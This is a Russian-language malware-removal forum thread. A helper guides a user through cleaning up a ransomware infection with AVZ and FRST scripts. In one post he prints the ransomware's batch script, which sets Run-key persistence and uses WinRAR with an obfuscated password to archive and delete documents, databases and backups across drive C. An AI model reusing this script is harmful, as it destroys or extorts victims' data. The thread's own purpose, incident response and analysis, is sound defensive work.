Serv4 Опубликовано 6 апреля, 2016 Опубликовано 6 апреля, 2016 Компьютер был заражен, подхватили шифровальщика файлов. Логи согласно правилам. Прошу помощи. CollectionLog-2016.04.06-14.35.zip
mike 1 Опубликовано 6 апреля, 2016 Опубликовано 6 апреля, 2016 Внимание! Рекомендации написаны специально для этого пользователя. Если рекомендации написаны не для вас, не используйте их - это может повредить вашей системе. Если у вас похожая проблема - создайте тему в разделе Уничтожение вирусов и выполните Правила оформления запроса о помощи. Здравствуйте! Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО. Важно! на Windows Vista/7/8 AVZ запускайте через контекстное меню проводника от имени Администратора. Выполните скрипт в АВЗ (Файл - Выполнить скрипт): begin RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced','HideFileExt', 0); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3); QuarantineFile('C:\Windows\Fonts\fms_metadata.exe',''); QuarantineFile('C:\Windows\Fonts\StaticCache.exe',''); QuarantineFile('C:\Users\Svetlana\appdata\roaming\scrss.exe',''); TerminateProcessByName('c:\users\svetlana\appdata\roaming\tor project\tor.exe'); TerminateProcessByName('c:\users\svetlana\appdata\roaming\gemware\node-webkit.exe'); QuarantineFile('c:\users\svetlana\appdata\roaming\gemware\node-webkit.exe',''); DeleteFile('c:\users\svetlana\appdata\roaming\gemware\node-webkit.exe','32'); RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','node-webkit'); DeleteFile('C:\Windows\Fonts\fms_metadata.exe','32'); DeleteFile('C:\Windows\Fonts\StaticCache.exe','32'); DeleteFile('C:\Users\Svetlana\appdata\roaming\scrss.exe','32'); ExecuteSysClean; RebootWindows(true); end. Внимание! Будет выполнена перезагрузка компьютера. После перезагрузки компьютера выполните скрипт в АВЗ: begin CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); end. quarantine.zip из папки AVZ отправьте по адресу mike1@avp.su. 1. В заголовке письма напишите "Карантин". 2. В письме напишите ссылку на Вашу тему. 3. Прикрепите файл карантина и нажмите "Отправить" Сделайте новые логи Автологгером.
Serv4 Опубликовано 6 апреля, 2016 Автор Опубликовано 6 апреля, 2016 1. quarantine.zip из папки AVZ отправил по адресу mike1@avp.su. 2. Новые логи сделал CollectionLog-2016.04.06-15.38.zip
mike 1 Опубликовано 6 апреля, 2016 Опубликовано 6 апреля, 2016 Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением. Убедитесь, что под окном Optional Scan отмечены "List BCD", "Driver MD5" и "90 Days Files". Нажмите кнопку Scan. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении. Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.
mike 1 Опубликовано 6 апреля, 2016 Опубликовано 6 апреля, 2016 Интересный семпл. Winrar юзает. SYSTEМ (S-1-5-21-407854602-3899431854-3273328985-1011 - Administrator - Enabled) Что за учетка? К тебе похоже удаленно зашли. ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows! Временно выгрузите антивирус, файрволл и прочее защитное ПО. Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool: CreateRestorePoint: CloseProcesses: HKU\S-1-5-21-407854602-3899431854-3273328985-500\...\Run: [TorProject] => C:\Users\Svetlana\AppData\Roaming\Tor Project\tor.exe [2233344 2015-09-14] () GroupPolicyScripts: Restriction <======= ATTENTION GroupPolicyScripts\User: Restriction <======= ATTENTION Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении! Обратите внимание, что компьютер будет перезагружен. Внимание! Если на рабочем столе будет создан архив upload.zip, то загрузите этот архив через данную форму
Serv4 Опубликовано 6 апреля, 2016 Автор Опубликовано 6 апреля, 2016 Интересный семпл. Winrar юзает. SYSTEМ (S-1-5-21-407854602-3899431854-3273328985-1011 - Administrator - Enabled) Что за учетка? К тебе похоже удаленно зашли. М-да, слона-то я и не приметил.... Fixlog.txt
mike 1 Опубликовано 6 апреля, 2016 Опубликовано 6 апреля, 2016 @echo off if not exist "%programfiles%\WinRAR\RAR.exe" (start "" %Temp%\dwr.exe) TIMEOUT /T 120 /NOBREAK reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v scrss /t REG_SZ /d "%AppData%"\scrss.exe /f REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v scrss /t REG_SZ /d "%AppData%"\scrss.exe /f >nul chcp 1251 setlocal enabledelayedexpansion set fPath=C: set rar="%programfiles%\WinRAR\RAR.exe" for /f "delims=" %%i in ('dir /b /s /a-d "%fPath%\*.7z" "%fPath%\*.hbi" "%fPath%\*.doc" "%fPath%\*.ord" "%fPath%\*.efd" "%fPath%\*.cab" "%fPath%\*.cf" "%fPath%\*.csv" "%fPath%\*.erf" "%fPath%\*.ldf" "%fPath%\*.ert" "%fPath%\*.dd" "%fPath%\*.nd" "%fPath%\*.lst" "%fPath%\*.pf" "%fPath%\*.prm" "%fPath%\*.xml" "%fPath%\*.lck" "%fPath%\*.mxl" "%fPath%\*.vbox" "%fPath%\*.vdi" "%fPath%\*.vmdk" "%fPath%\*.dt" "%fPath%\*.cf" "%fPath%\*.epf" "%fPath%\*.dat" "%fPath%\*.cdx" "%fPath%\*.st" "%fPath%\*.tip" "%fPath%\*.fdb" "%fPath%\*.raw" "%fPath%\*.idx" "%fPath%\*.1cl" "%fPath%\*.db" "%fPath%\*.xtbl" "%fPath%\*.rcd" "%fPath%\*.bak" "%fPath%\*.sql" "%fPath%\*.tib" "%fPath%\*.scx" "%fPath%\*.ods" "%fPath%\*.nup" "%fPath%\*.tif" "%fPath%\*.bkf" "%fPath%\*.zip" "%fPath%\*.rar" "%fPath%\*.docx" "%fPath%\*.xls" "%fPath%\*.xlsx" "%fPath%\*.pdf" "%fPath%\*.djvu" "%fPath%\*.mdb" "%fPath%\*.cer" "%fPath%\*.p12" "%fPath%\*.1cd" "%fPath%\*.md" "%fPath%\*.kwm" "%fPath%\*.pwm" "%fPath%\*.pfx" "%fPath%\*.mdf" "%fPath%\*.dbf" "%fPath%\*.odt" "%fPath%\*.vob" "%fPath%\*.ifo" "%fPath%\*.umpts" "%fPath%\*.clme1" "%fPath%\*.srx" "%fPath%\*.mir" "%fPath%\*.df7" "%fPath%\*.fpt" "%fPath%\*.jrxml" "%fPath%\*.jpg" "%fPath%\*.jpeg" "%fPath%\*.mp4" "%fPath%\*.mp3" "%fPath%\*.php" "%fPath%\*.html" "%fPath%\*.mira" "%fPath%\*.fbk" "%fPath%\*.gbk" "%fPath%\*.ndf"') do ( for /f "delims=" %%j in ("%%i") do ( %rar% a%tgxtnfnzcgm% %rlaxsse%-%wenpgbayurpah%s%yemotmkpoytqr%f%whmxdb%x%nfh% %gthchenzzc%-%yaevblaiyzyd%d%znoswkuuugo%h%mswqalbodk% %hwg%-%tkvriqspctf%i%pojqxieg%b%duqnpuwqi%c%hdsr%k%brsgejtbc% %vlvqvbdfwbioke%-%dzqejtgqh%i%cnjm%n%edxxpfbnqmhgm%u%spiqyeznt%l%epeoygotrqvvcq% %qsrjduaepfpbc%-%btnidvokn%y%yddd% %axzhujwh%-%pzyltuckrohp%m%bdyxojghd%0%adddlwcxfrztm% %dwm%-%wenpg%d%bazprjohrmdz%f%ssmdtrodhsuy% %lcif%-%fqiuk%p%bxvbwwzrdhhfk%"%jwfjfab%m%nigvsknambunep%F%chgquvbem%M%tkvriqs%N%xiqcozzfcd%H%kmuuv%J%ribov%f%kptcrmbivyier%n%iqdoack%6%fzlyyrupzs%5%agcliwu%r%cnjmmiiunts%g%xrxmbaulqxfyc%U%wkq%D%srhyvermg%D%fzpdwfqgbmnt%y%xrcrznqcss%t%mwadvy%u%kpyipa%h%ekfyegetsvz%k%uhrdndezo%d%msskcxe%f%gnegprhjzna%5%dwmqogrztani%r%fjwnjf%4%hgsz%3%cpjujiatzdqyn%b%nfhnvkvbzrw%f%uugggpu%d%hfnte%"%njlaqxjrnvshyc% %jdnlube%-%tnzeddg%e%ksxqma%p%ajgz%1%tfw% "%%~dpj\%%~nj.rar" "%%i" ) ) С виду вроде все не так плохо, но как генерируются пароль для SFX архивов я пока не понял. Можете пока создать запрос http://forum.kasperskyclub.ru/index.php?showtopic=48525 В запросе прикрепите: 1. Архив quarantine.zip 2. Небольшой зашифрованный файл в архиве.
Serv4 Опубликовано 7 апреля, 2016 Автор Опубликовано 7 апреля, 2016 В ответ на запрос через личный кабинет - тишина... Что делать дальше?
Serv4 Опубликовано 12 апреля, 2016 Автор Опубликовано 12 апреля, 2016 Тему можно закрыть. Вопрос решен.
Serv4 Опубликовано 12 апреля, 2016 Автор Опубликовано 12 апреля, 2016 До сегодня: "В работе", "наберитесь терпения". Я закрыл запрос. Время не ждет. )
Рекомендуемые сообщения
Пожалуйста, войдите, чтобы комментировать
Вы сможете оставить комментарий после входа в
Войти